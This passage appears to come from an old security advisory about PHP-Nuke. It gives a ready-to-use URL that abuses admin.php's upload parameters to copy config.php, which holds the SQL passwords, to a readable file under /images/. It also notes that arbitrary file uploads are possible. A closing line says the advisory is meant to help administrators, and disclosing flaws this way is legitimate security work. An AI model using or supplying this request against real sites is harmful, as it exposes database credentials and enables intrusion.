http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.tx
t&wdir=/images/&userfile=config.php&userfile_name=hacked.txt

 the admin 'login' page will be prompted just go to 
http://www.server.net/images/hacked.txt and you will see config.php that
as everyone knows contain the sql's passwords, you can even upload files...i
leave you the 'fun' to find all the ways to use it... and try to dont be a
SCRIPT KIDDIE we wrote this advisory to help who runs php nuke and NOT TO
LET YOU HAVE FUN.